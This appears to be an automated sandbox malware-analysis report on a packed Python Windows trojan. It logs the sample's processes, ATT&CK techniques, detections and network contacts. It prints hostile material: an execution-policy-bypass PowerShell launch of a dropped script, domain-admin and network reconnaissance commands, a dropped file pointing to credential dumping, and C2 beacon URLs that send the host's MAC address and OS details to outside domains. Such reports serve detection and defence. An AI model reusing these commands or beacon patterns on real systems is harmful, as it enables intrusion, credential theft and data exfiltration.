Source: C:\Users\user\Desktop\UlJpFEz1Cj.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\SysNative\WindowsPowerShell\v1.0\powershell.exe -exec bypass 'import-module C:\Users\user\Desktop\m2.ps1'
Source: C:\Users\user\Desktop\UlJpFEz1Cj.exeProcess created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c ipconfig /all
Source: C:\Users\user\Desktop\UlJpFEz1Cj.exeProcess created: C:\Windows\SysWOW64\ipconfig.exe ipconfig /all
Source: C:\Users\user\Desktop\UlJpFEz1Cj.exeProcess created: C:\Windows\SysWOW64\NETSTAT.EXE netstat -na
Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\wbem\WMIC.exe wmic ntdomain get domainname
Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\net.exe net localgroup administrators
Source: C:\Windows\SysWOW64\net.exeProcess created: C:\Windows\SysWOW64\net1.exe C:\Windows\system32\net1 localgroup administrators
Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\net.exe net group 'domain admins' /domain
Source: C:\Windows\SysWOW64\net.exeProcess created: C:\Windows\SysWOW64\net1.exe C:\Windows\system32\net1 group 'domain admins' /domain
Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\ipconfig.exe ipconfig /all
Source: C:\Users\user\Desktop\UlJpFEz1Cj.exeQueries volume information: C:\Users\user\Desktop\UlJpFEz1Cj.exe VolumeInformation
Source: C:\Users\user\Desktop\UlJpFEz1Cj.exeQueries volume information: C:\Users\user\Desktop\UlJpFEz1Cj.exe VolumeInformation
Source: C:\Users\user\Desktop\UlJpFEz1Cj.exeQueries volume information: C:\Users\user\Desktop\UlJpFEz1Cj.exe VolumeInformation
Source: C:\Users\user\Desktop\UlJpFEz1Cj.exeQueries volume information: C:\Users\user\Desktop\UlJpFEz1Cj.exe VolumeInformation
Source: C:\Users\user\Desktop\UlJpFEz1Cj.exeQueries volume information: C:\Users\user\Desktop\UlJpFEz1Cj.exe VolumeInformation
Source: C:\Users\user\Desktop\UlJpFEz1Cj.exeQueries volume information: C:\Users\user\Desktop\UlJpFEz1Cj.exe VolumeInformation
Source: C:\Users\user\Desktop\UlJpFEz1Cj.exeQueries volume information: C:\Users\user\Desktop\UlJpFEz1Cj.exe VolumeInformation
Source: C:\Users\user\Desktop\UlJpFEz1Cj.exeQueries volume information: C:\Users\user\Desktop\UlJpFEz1Cj.exe VolumeInformation
Source: C:\Users\user\Desktop\UlJpFEz1Cj.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI65282\_ctypes.pyd VolumeInformation
Source: C:\Users\user\Desktop\UlJpFEz1Cj.exeQueries volume information: C:\Users\user\Desktop\UlJpFEz1Cj.exe VolumeInformation
Source: C:\Users\user\Desktop\UlJpFEz1Cj.exeQueries volume information: C:\Users\user\Desktop\UlJpFEz1Cj.exe VolumeInformation
Source: C:\Users\user\Desktop\UlJpFEz1Cj.exeQueries volume information: C:\Users\user\Desktop\UlJpFEz1Cj.exe VolumeInformation
Source: C:\Users\user\Desktop\UlJpFEz1Cj.exeQueries volume information: C:\Users\user\Desktop\UlJpFEz1Cj.exe VolumeInformation
Source: C:\Users\user\Desktop\UlJpFEz1Cj.exeQueries volume information: C:\Users\user\Desktop\UlJpFEz1Cj.exe VolumeInformation
Source: C:\Users\user\Desktop\UlJpFEz1Cj.exeQueries volume information: C:\Users\user\Desktop\UlJpFEz1Cj.exe VolumeInformation
Source: C:\Users\user\Desktop\UlJpFEz1Cj.exeQueries volume information: C:\Users\user\Desktop\UlJpFEz1Cj.exe VolumeInformation
Source: C:\Users\user\Desktop\UlJpFEz1Cj.exeQueries volume information: C:\Users\user\Desktop\UlJpFEz1Cj.exe VolumeInformation
Source: C:\Users\user\Desktop\UlJpFEz1Cj.exeQueries volume information: C:\Users\user\Desktop\UlJpFEz1Cj.exe VolumeInformation
Source: C:\Users\user\Desktop\UlJpFEz1Cj.exeQueries volume information: C:\Users\user\Desktop\UlJpFEz1Cj.exe VolumeInformation
Source: C:\Users\user\Desktop\UlJpFEz1Cj.exeQueries volume information: C:\Users\user\Desktop\UlJpFEz1Cj.exe VolumeInformation
Source: C:\Users\user\Desktop\UlJpFEz1Cj.exeQueries volume information: C:\Users\user\Desktop\UlJpFEz1Cj.exe VolumeInformation
Source: C:\Users\user\Desktop\UlJpFEz1Cj.exeQueries volume information: C:\Users\user\Desktop\UlJpFEz1Cj.exe VolumeInformation
Source: C:\Users\user\Desktop\UlJpFEz1Cj.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI65282\_multiprocessing.pyd VolumeInformation
Source: C:\Users\user\Desktop\UlJpFEz1Cj.exeQueries volume information: C:\Users\user\Desktop\UlJpFEz1Cj.exe VolumeInformation
Source: C:\Users\user\Desktop\UlJpFEz1Cj.exeQueries volume information: C:\Users\user\Desktop\UlJpFEz1Cj.exe VolumeInformation
Source: C:\Users\user\Desktop\UlJpFEz1Cj.exeQueries volume information: C:\Users\user\Desktop\UlJpFEz1Cj.exe VolumeInformation
Source: C:\Users\user\Desktop\UlJpFEz1Cj.exeQueries volume information: C:\Users\user\Desktop\UlJpFEz1Cj.exe VolumeInformation
Source: C:\Users\user\Desktop\UlJpFEz1Cj.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI65282\_hashlib.pyd VolumeInformation
Source: C:\Users\user\Desktop\UlJpFEz1Cj.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI65282\_socket.pyd VolumeInformation
Source: C:\Users\user\Desktop\UlJpFEz1Cj.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI65282\_ssl.pyd VolumeInformation
Source: C:\Users\user\Desktop\UlJpFEz1Cj.exeQueries volume information: C:\Users\user\Desktop\UlJpFEz1Cj.exe VolumeInformation
Source: C:\Users\user\Desktop\UlJpFEz1Cj.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI65282\win32event.pyd VolumeInformation
Source: C:\Users\user\Desktop\UlJpFEz1Cj.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI65282\win32api.pyd VolumeInformation
Source: C:\Users\user\Desktop\UlJpFEz1Cj.exeQueries volume information: C:\Users\user\Desktop\UlJpFEz1Cj.exe VolumeInformation
Source: C:\Users\user\Desktop\UlJpFEz1Cj.exeQueries volume information: C:\Users\user\Desktop\UlJpFEz1Cj.exe VolumeInformation
Source: C:\Users\user\Desktop\UlJpFEz1Cj.exeQueries volume information: C:\Users\user\Desktop\UlJpFEz1Cj.exe VolumeInformation
Source: C:\Users\user\Desktop\UlJpFEz1Cj.exeQueries volume information: C:\Users\user\Desktop\UlJpFEz1Cj.exe VolumeInformation
Source: C:\Users\user\Desktop\UlJpFEz1Cj.exeQueries volume information: C:\Users\user\Desktop\UlJpFEz1Cj.exe VolumeInformation
Source: C:\Users\user\Desktop\UlJpFEz1Cj.exeQueries volume information: C:\Users\user\Desktop\UlJpFEz1Cj.exe VolumeInformation
Source: C:\Users\user\Desktop\UlJpFEz1Cj.exeQueries volume information: C:\Users\user\Desktop\UlJpFEz1Cj.exe VolumeInformation
Source: C:\Users\user\Desktop\UlJpFEz1Cj.exeQueries volume information: C:\Users\user\Desktop\UlJpFEz1Cj.exe VolumeInformation
Source: C:\Users\user\Desktop\UlJpFEz1Cj.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI65282\_mssql.pyd VolumeInformation
Source: C:\Users\user\Desktop\UlJpFEz1Cj.exeQueries volume information: C:\Users\user\Desktop\UlJpFEz1Cj.exe VolumeInformation
Source: C:\Users\user\Desktop\UlJpFEz1Cj.exeQueries volume information: C:\Users\user\Desktop\UlJpFEz1Cj.exe VolumeInformation
Source: C:\Users\user\Desktop\UlJpFEz1Cj.exeQueries volume information: C:\Users\user\Desktop\UlJpFEz1Cj.exe VolumeInformation
Source: C:\Users\user\Desktop\UlJpFEz1Cj.exeQueries volume information: C:\Users\user\Desktop\UlJpFEz1Cj.exe VolumeInformation
Source: C:\Users\user\Desktop\UlJpFEz1Cj.exeQueries volume information: C:\Users\user\Desktop\UlJpFEz1Cj.exe VolumeInformation
Source: C:\Users\user\Desktop\UlJpFEz1Cj.exeQueries volume information: C:\Users\user\Desktop\UlJpFEz1Cj.exe VolumeInformation
Source: C:\Users\user\Desktop\UlJpFEz1Cj.exeQueries volume information: C:\Users\user\Desktop\UlJpFEz1Cj.exe VolumeInformation
Source: C:\Users\user\Desktop\UlJpFEz1Cj.exeQueries volume information: C:\Users\user\Desktop\UlJpFEz1Cj.exe VolumeInformation
Source: C:\Users\user\Desktop\UlJpFEz1Cj.exeQueries volume information: C:\Users\user\Desktop\UlJpFEz1Cj.exe VolumeInformation
Source: C:\Users\user\Desktop\UlJpFEz1Cj.exeQueries volume information: C:\Users\user\Desktop\UlJpFEz1Cj.exe VolumeInformation
Source: C:\Users\user\Desktop\UlJpFEz1Cj.exeQueries volume information: C:\Users\user\Desktop\UlJpFEz1Cj.exe VolumeInformation
Source: C:\Users\user\Desktop\UlJpFEz1Cj.exeQueries volume information: C:\Users\user\Desktop\UlJpFEz1Cj.exe VolumeInformation
Source: C:\Users\user\Desktop\UlJpFEz1Cj.exeQueries volume information: C:\Users\user\Desktop\UlJpFEz1Cj.exe VolumeInformation
Source: C:\Users\user\Desktop\UlJpFEz1Cj.exeQueries volume information: C:\Users\user\Desktop\UlJpFEz1Cj.exe VolumeInformation
Source: C:\Users\user\Desktop\UlJpFEz1Cj.exeQueries volume information: C:\Users\user\Desktop\UlJpFEz1Cj.exe VolumeInformation
Source: C:\Users\user\Desktop\UlJpFEz1Cj.exeQueries volume information: C:\Users\user\Desktop\UlJpFEz1Cj.exe VolumeInformation
Source: C:\Users\user\Desktop\UlJpFEz1Cj.exeQueries volume information: C:\Users\user\Desktop\UlJpFEz1Cj.exe VolumeInformation
Source: C:\Users\user\Desktop\UlJpFEz1Cj.exeQueries volume information: C:\Users\user\Desktop\UlJpFEz1Cj.exe VolumeInformation
Source: C:\Users\user\Desktop\UlJpFEz1Cj.exeQueries volume information: C:\Users\user\Desktop\UlJpFEz1Cj.exe VolumeInformation
Source: C:\Users\user\Desktop\UlJpFEz1Cj.exeQueries volume information: C:\Users\user\Desktop\UlJpFEz1Cj.exe VolumeInformation
Source: C:\Users\user\Desktop\UlJpFEz1Cj.exeQueries volume information: C:\Users\user\Desktop\UlJpFEz1Cj.exe VolumeInformation
Source: C:\Users\user\Desktop\UlJpFEz1Cj.exeQueries volume information: C:\Users\user\Desktop\UlJpFEz1Cj.exe VolumeInformation
Source: C:\Users\user\Desktop\UlJpFEz1Cj.exeQueries volume information: C:\Users\user\Desktop\UlJpFEz1Cj.exe VolumeInformation
Source: C:\Users\user\Desktop\UlJpFEz1Cj.exeQueries volume information: C:\Users\user\Desktop\UlJpFEz1Cj.exe VolumeInformation
Source: C:\Users\user\Desktop\UlJpFEz1Cj.exeQueries volume information: C:\Users\user\Desktop\UlJpFEz1Cj.exe VolumeInformation
Source: C:\Users\user\Desktop\UlJpFEz1Cj.exeQueries volume information: C:\Users\user\Desktop\UlJpFEz1Cj.exe VolumeInformation
Source: C:\Users\user\Desktop\UlJpFEz1Cj.exeQueries volume information: C:\Users\user\Desktop\UlJpFEz1Cj.exe VolumeInformation
Source: C:\Users\user\Desktop\UlJpFEz1Cj.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI65282\select.pyd VolumeInformation
Source: C:\Users\user\Desktop\UlJpFEz1Cj.exeQueries volume information: C:\Users\user\Desktop\UlJpFEz1Cj.exe VolumeInformation
Source: C:\Users\user\Desktop\UlJpFEz1Cj.exeQueries volume information: C:\Users\user\Desktop\UlJpFEz1Cj.exe VolumeInformation
Source: C:\Users\user\Desktop\UlJpFEz1Cj.exeQueries volume information: C:\Users\user\Desktop\UlJpFEz1Cj.exe VolumeInformation
Source: C:\Users\user\Desktop\UlJpFEz1Cj.exeQueries volume information: C:\Users\user\Desktop\UlJpFEz1Cj.exe VolumeInformation
Source: C:\Users\user\Desktop\UlJpFEz1Cj.exeQueries volume information: C:\Users\user\Desktop\UlJpFEz1Cj.exe VolumeInformation
Source: C:\Users\user\Desktop\UlJpFEz1Cj.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI65282\Crypto.Cipher._ARC4.pyd VolumeInformation
Source: C:\Users\user\Desktop\UlJpFEz1Cj.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI65282\Crypto.Cipher._DES.pyd VolumeInformation
Source: C:\Users\user\Desktop\UlJpFEz1Cj.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI65282\Crypto.Hash._MD4.pyd VolumeInformation
Source: C:\Users\user\Desktop\UlJpFEz1Cj.exeQueries volume information: C:\Users\user\Desktop\UlJpFEz1Cj.exe VolumeInformation
Source: C:\Users\user\Desktop\UlJpFEz1Cj.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI65282\Crypto.Util.strxor.pyd VolumeInformation
Source: C:\Users\user\Desktop\UlJpFEz1Cj.exeQueries volume information: C:\Users\user\Desktop\UlJpFEz1Cj.exe VolumeInformation
Source: C:\Users\user\Desktop\UlJpFEz1Cj.exeQueries volume information: C:\Users\user\Desktop\UlJpFEz1Cj.exe VolumeInformation
Source: C:\Users\user\Desktop\UlJpFEz1Cj.exeQueries volume information: C:\Users\user\Desktop\UlJpFEz1Cj.exe VolumeInformation
Source: C:\Users\user\Desktop\UlJpFEz1Cj.exeQueries volume information: C:\Users\user\Desktop\UlJpFEz1Cj.exe VolumeInformation
Source: C:\Users\user\Desktop\UlJpFEz1Cj.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI65282\Crypto.Cipher._AES.pyd VolumeInformation
Source: C:\Users\user\Desktop\UlJpFEz1Cj.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI65282\Crypto.Cipher._DES3.pyd VolumeInformation
Source: C:\Users\user\Desktop\UlJpFEz1Cj.exeQueries volume information: C:\Users\user\Desktop\UlJpFEz1Cj.exe VolumeInformation
Source: C:\Users\user\Desktop\UlJpFEz1Cj.exeQueries volume information: C:\Users\user\Desktop\UlJpFEz1Cj.exe VolumeInformation
Source: C:\Users\user\Desktop\UlJpFEz1Cj.exeQueries volume information: C:\Users\user\Desktop\UlJpFEz1Cj.exe VolumeInformation
Source: C:\Users\user\Desktop\UlJpFEz1Cj.exeQueries volume information: C:\Users\user\Desktop\UlJpFEz1Cj.exe VolumeInformation
Source: C:\Users\user\Desktop\UlJpFEz1Cj.exeQueries volume information: C:\Users\user\Desktop\UlJpFEz1Cj.exe VolumeInformation
Source: C:\Users\user\Desktop\UlJpFEz1Cj.exeQueries volume information: C:\Users\user\Desktop\UlJpFEz1Cj.exe VolumeInformation
Source: C:\Users\user\Desktop\UlJpFEz1Cj.exeQueries volume information: C:\Users\user\Desktop\UlJpFEz1Cj.exe VolumeInformation
Source: C:\Users\user\Desktop\UlJpFEz1Cj.exeQueries volume information: C:\Users\user\Desktop\UlJpFEz1Cj.exe VolumeInformation
Source: C:\Users\user\Desktop\UlJpFEz1Cj.exeQueries volume information: C:\Users\user\Desktop\UlJpFEz1Cj.exe VolumeInformation
Source: C:\Users\user\Desktop\UlJpFEz1Cj.exeQueries volume information: C:\Users\user\Desktop\UlJpFEz1Cj.exe VolumeInformation
Source: C:\Users\user\Desktop\UlJpFEz1Cj.exeQueries volume information: C:\Users\user\Desktop\UlJpFEz1Cj.exe VolumeInformation
Source: C:\Users\user\Desktop\UlJpFEz1Cj.exeQueries volume information: C:\Users\user\Desktop\UlJpFEz1Cj.exe VolumeInformation
Source: C:\Users\user\Desktop\UlJpFEz1Cj.exeQueries volume information: C:\Users\user\Desktop\UlJpFEz1Cj.exe VolumeInformation
Source: C:\Users\user\Desktop\UlJpFEz1Cj.exeQueries volume information: C:\Users\user\Desktop\UlJpFEz1Cj.exe VolumeInformation
Source: C:\Users\user\Desktop\UlJpFEz1Cj.exeQueries volume information: C:\Users\user\Desktop\UlJpFEz1Cj.exe VolumeInformation
Source: C:\Users\user\Desktop\UlJpFEz1Cj.exeQueries volume information: C:\Users\user\Desktop\UlJpFEz1Cj.exe VolumeInformation
Source: C:\Users\user\Desktop\UlJpFEz1Cj.exeQueries volume information: C:\Users\user\Desktop\UlJpFEz1Cj.exe VolumeInformation
Source: C:\Users\user\Desktop\UlJpFEz1Cj.exeQueries volume information: C:\Users\user\Desktop\UlJpFEz1Cj.exe VolumeInformation
Source: C:\Users\user\Desktop\UlJpFEz1Cj.exeQueries volume information: C:\Users\user\Desktop\UlJpFEz1Cj.exe VolumeInformation
Source: C:\Users\user\Desktop\UlJpFEz1Cj.exeQueries volume information: C:\Users\user\Desktop\UlJpFEz1Cj.exe VolumeInformation
Source: C:\Users\user\Desktop\UlJpFEz1Cj.exeQueries volume information: C:\Users\user\Desktop\UlJpFEz1Cj.exe VolumeInformation
Source: C:\Users\user\Desktop\UlJpFEz1Cj.exeQueries volume information: C:\Users\user\Desktop\UlJpFEz1Cj.exe VolumeInformation
Source: C:\Users\user\Desktop\UlJpFEz1Cj.exeQueries volume information: C:\Users\user\Desktop\UlJpFEz1Cj.exe VolumeInformation
Source: C:\Users\user\Desktop\UlJpFEz1Cj.exeQueries volume information: C:\Users\user\Desktop\UlJpFEz1Cj.exe VolumeInformation
Source: C:\Users\user\Desktop\UlJpFEz1Cj.exeQueries volume information: C:\Users\user\Desktop\UlJpFEz1Cj.exe VolumeInformation
Source: C:\Users\user\Desktop\UlJpFEz1Cj.exeQueries volume information: C:\Users\user\Desktop\UlJpFEz1Cj.exe VolumeInformation
Source: C:\Users\user\Desktop\UlJpFEz1Cj.exeQueries volume information: C:\Users\user\Desktop\UlJpFEz1Cj.exe VolumeInformation
Source: C:\Users\user\Desktop\UlJpFEz1Cj.exeQueries volume information: C:\Users\user\Desktop\UlJpFEz1Cj.exe VolumeInformation
Source: C:\Users\user\Desktop\UlJpFEz1Cj.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI65282\bz2.pyd VolumeInformation
Source: C:\Users\user\Desktop\UlJpFEz1Cj.exeQueries volume information: C:\Users\user\Desktop\UlJpFEz1Cj.exe VolumeInformation
Source: C:\Users\user\Desktop\UlJpFEz1Cj.exeQueries volume information: C:\Users\user\Desktop\m2.ps1 VolumeInformation
Source: C:\Users\user\Desktop\UlJpFEz1Cj.exeQueries volume information: C:\Users\user\Desktop\mkatz.ini VolumeInformation
Source: C:\Users\user\Desktop\UlJpFEz1Cj.exeQueries volume information: C:\Users\user\Desktop\UlJpFEz1Cj.exe VolumeInformation
Source: C:\Users\user\Desktop\UlJpFEz1Cj.exeQueries volume information: C:\Users\user\Desktop\UlJpFEz1Cj.exe VolumeInformation
Source: C:\Users\user\Desktop\UlJpFEz1Cj.exeQueries volume information: C:\Users\user\Desktop\UlJpFEz1Cj.exe VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
Source: C:\Users\user\Desktop\UlJpFEz1Cj.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid

Stealing of Sensitive Information:

barindex
Gathers network related connection and port information
Source: C:\Users\user\Desktop\UlJpFEz1Cj.exeProcess created: C:\Windows\SysWOW64\NETSTAT.EXE netstat -na
Source: C:\Users\user\Desktop\UlJpFEz1Cj.exeProcess created: C:\Windows\SysWOW64\NETSTAT.EXE netstat -na

Mitre Att&ck Matrix

Initial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionExfiltrationCommand and ControlNetwork EffectsRemote Service EffectsImpact
Valid AccountsWindows Management Instrumentation11Path InterceptionProcess Injection11Masquerading1OS Credential Dumping1Network Share Discovery1Remote ServicesData from Local SystemExfiltration Over Other Network MediumEncrypted Channel2Eavesdrop on Insecure Network CommunicationRemotely Track Device Without AuthorizationModify System Partition
Default AccountsPowerShell1Boot or Logon Initialization ScriptsBoot or Logon Initialization ScriptsVirtualization/Sandbox Evasion31LSASS MemoryQuery Registry1Remote Desktop ProtocolData from Removable MediaExfiltration Over BluetoothIngress Tool Transfer1Exploit SS7 to Redirect Phone Calls/SMSRemotely Wipe Data Without AuthorizationDevice Lockout
Domain AccountsAt (Linux)Logon Script (Windows)Logon Script (Windows)Process Injection11Security Account ManagerSecurity Software Discovery21SMB/Windows Admin SharesData from Network Shared DriveAutomated ExfiltrationNon-Application Layer Protocol2Exploit SS7 to Track Device LocationObtain Device Cloud BackupsDelete Device Data
Local AccountsAt (Windows)Logon Script (Mac)Logon Script (Mac)Software Packing11NTDSProcess Discovery1Distributed Component Object ModelInput CaptureScheduled TransferApplication Layer Protocol3SIM Card SwapCarrier Billing Fraud
Cloud AccountsCronNetwork Logon ScriptNetwork Logon ScriptSoftware PackingLSA SecretsVirtualization/Sandbox Evasion31SSHKeyloggingData Transfer Size LimitsFallback ChannelsManipulate Device CommunicationManipulate App Store Rankings or Ratings
Replication Through Removable MediaLaunchdRc.commonRc.commonSteganographyCached Domain CredentialsApplication Window Discovery1VNCGUI Input CaptureExfiltration Over C2 ChannelMultiband CommunicationJamming or Denial of ServiceAbuse Accessibility Features
External Remote ServicesScheduled TaskStartup ItemsStartup ItemsCompile After DeliveryDCSyncRemote System Discovery1Windows Remote ManagementWeb Portal CaptureExfiltration Over Alternative ProtocolCommonly Used PortRogue Wi-Fi Access PointsData Encrypted for Impact
Drive-by CompromiseCommand and Scripting InterpreterScheduled Task/JobScheduled Task/JobIndicator Removal from ToolsProc FilesystemSystem Network Configuration Discovery2Shared WebrootCredential API HookingExfiltration Over Symmetric Encrypted Non-C2 ProtocolApplication Layer ProtocolDowngrade to Insecure ProtocolsGenerate Fraudulent Advertising Revenue
Exploit Public-Facing ApplicationPowerShellAt (Linux)At (Linux)Masquerading/etc/passwd and /etc/shadowSystem Network Connections Discovery2Software Deployment ToolsData StagedExfiltration Over Asymmetric Encrypted Non-C2 ProtocolWeb ProtocolsRogue Cellular Base StationData Destruction
Supply Chain CompromiseAppleScriptAt (Windows)At (Windows)Invalid Code SignatureNetwork SniffingFile and Directory Discovery2Taint Shared ContentLocal Data StagingExfiltration Over Unencrypted/Obfuscated Non-C2 ProtocolFile Transfer ProtocolsData Encrypted for Impact
Compromise Software Dependencies and Development ToolsWindows Command ShellCronCronRight-to-Left OverrideInput CaptureSystem Information Discovery13Replication Through Removable MediaRemote Data StagingExfiltration Over Physical MediumMail ProtocolsService Stop

Behavior Graph

Hide Legend

Legend:

  • Process
  • Signature
  • Created File
  • DNS/IP Info
  • Is Dropped
  • Is Windows Process
  • Number of created Registry Values
  • Number of created Files
  • Visual Basic
  • Delphi
  • Java
  • .Net C# or VB.NET
  • C, C++ or other language
  • Is malicious
  • Internet
behaviorgraph top1 dnsIp2 2 Behavior Graph ID: 381876 Sample: UlJpFEz1Cj Startdate: 05/04/2021 Architecture: WINDOWS Score: 100 52 info.ackng.com 2->52 54 info.abbny.com 2->54 56 2 other IPs or domains 2->56 70 Snort IDS alert for network traffic (e.g. based on Emerging Threat rules) 2->70 72 Multi AV Scanner detection for domain / URL 2->72 74 Malicious sample detected (through community Yara rule) 2->74 76 5 other signatures 2->76 10 UlJpFEz1Cj.exe 34 2->10         started        signatures3 process4 file5 42 C:\Users\user\AppData\Local\...\win32wnet.pyd, PE32 10->42 dropped 44 C:\Users\user\AppData\Local\...\win32pipe.pyd, PE32 10->44 dropped 46 C:\Users\user\AppData\...\win32event.pyd, PE32 10->46 dropped 48 25 other files (none is malicious) 10->48 dropped 82 Uses netstat to query active network connections and open ports 10->82 84 Gathers network related connection and port information 10->84 14 UlJpFEz1Cj.exe 3 10->14         started        19 conhost.exe 10->19         started        signatures6 process7 dnsIp8 58 info.abbny.com 173.231.189.15, 49746, 50005, 50490 VOXEL-DOT-NETUS United States 14->58 60 beahh.com 72.52.178.23, 49743, 49881, 50366 LIQUIDWEBUS United States 14->60 62 101 other IPs or domains 14->62 50 C:\Users\user\Desktop\m2.ps1, ASCII 14->50 dropped 64 Connects to many different private IPs via SMB (likely to spread or exploit) 14->64 66 Connects to many different private IPs (likely to spread or exploit) 14->66 68 Gathers network related connection and port information 14->68 21 cmd.exe 1 14->21         started        24 powershell.exe 18 14->24         started        26 cmd.exe 1 14->26         started        28 4 other processes 14->28 file9 signatures10 process11 signatures12 78 Uses ipconfig to lookup or modify the Windows network settings 21->78 30 WMIC.exe 1 21->30         started        80 Found suspicious powershell code related to unpacking or dynamic code loading 24->80 32 net.exe 1 26->32         started        34 net.exe 1 28->34         started        36 ipconfig.exe 28->36         started        process13 process14 38 net1.exe 1 32->38         started        40 net1.exe 1 34->40         started       

Screenshots

Thumbnails

This section contains all screenshots as thumbnails, including those not shown in the slideshow.

windows-stand

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

SourceDetectionScannerLabelLink
UlJpFEz1Cj.exe61%VirustotalBrowse
UlJpFEz1Cj.exe83%ReversingLabsWin32.Trojan.InjectPyinc
UlJpFEz1Cj.exe100%AviraHEUR/AGEN.1103356
UlJpFEz1Cj.exe100%Joe Sandbox ML

Dropped Files

SourceDetectionScannerLabelLink
C:\Users\user\Desktop\m2.ps1100%AviraTR/Drop.PShell.B
C:\Users\user\AppData\Local\Temp\_MEI65282\Crypto.Cipher._AES.pyd0%MetadefenderBrowse
C:\Users\user\AppData\Local\Temp\_MEI65282\Crypto.Cipher._AES.pyd0%ReversingLabs
C:\Users\user\AppData\Local\Temp\_MEI65282\Crypto.Cipher._ARC4.pyd0%MetadefenderBrowse
C:\Users\user\AppData\Local\Temp\_MEI65282\Crypto.Cipher._ARC4.pyd0%ReversingLabs
C:\Users\user\AppData\Local\Temp\_MEI65282\Crypto.Cipher._DES.pyd0%MetadefenderBrowse
C:\Users\user\AppData\Local\Temp\_MEI65282\Crypto.Cipher._DES.pyd0%ReversingLabs

Unpacked PE Files

SourceDetectionScannerLabelLinkDownload
3.1.UlJpFEz1Cj.exe.1120000.15.unpack100%AviraTR/Crypt.XPACK.Gen7Download File
3.1.UlJpFEz1Cj.exe.1120000.16.unpack100%AviraTR/Crypt.XPACK.Gen7Download File
3.1.UlJpFEz1Cj.exe.1150000.19.unpack100%AviraTR/Crypt.XPACK.Gen7Download File
3.1.UlJpFEz1Cj.exe.1160000.22.unpack100%AviraTR/Crypt.XPACK.Gen7Download File
3.1.UlJpFEz1Cj.exe.1160000.21.unpack100%AviraTR/Crypt.XPACK.Gen7Download File
3.1.UlJpFEz1Cj.exe.1150000.20.unpack100%AviraTR/Crypt.XPACK.Gen7Download File

Domains

SourceDetectionScannerLabelLink
jsonip.com0%VirustotalBrowse
42.pl0%VirustotalBrowse
info.ackng.com11%VirustotalBrowse
beahh.com11%VirustotalBrowse

URLs

SourceDetectionScannerLabelLink
http://pesterbdd.com/images/Pester.png0%URL Reputationsafe
http://pesterbdd.com/images/Pester.png0%URL Reputationsafe
http://pesterbdd.com/images/Pester.png0%URL Reputationsafe
http://jsonip.com0%Avira URL Cloudsafe
http://ip.42.pl/raw0%Avira URL Cloudsafe
https://contoso.com/License0%URL Reputationsafe
https://contoso.com/License0%URL Reputationsafe
https://contoso.com/License0%URL Reputationsafe
https://contoso.com/Icon0%URL Reputationsafe
https://contoso.com/Icon0%URL Reputationsafe
https://contoso.com/Icon0%URL Reputationsafe
http://info.beahh.com/e.png?id=830021&mac=EC-F4-BB-86-2D-ED,00-01-00-01-24-A6&OS=Windows-post2008Server-6.2.9200&BIT=32bit&IT=2021-04-05,11:23:08&c=1&VER=9&d=0&from=&mpass=&size=6967362&num=0&sa=&dig=0&mdl=00%Avira URL Cloudsafe
http://w.beahh.com/page.html?p%COMPUTERNAME%0%Avira URL Cloudsafe
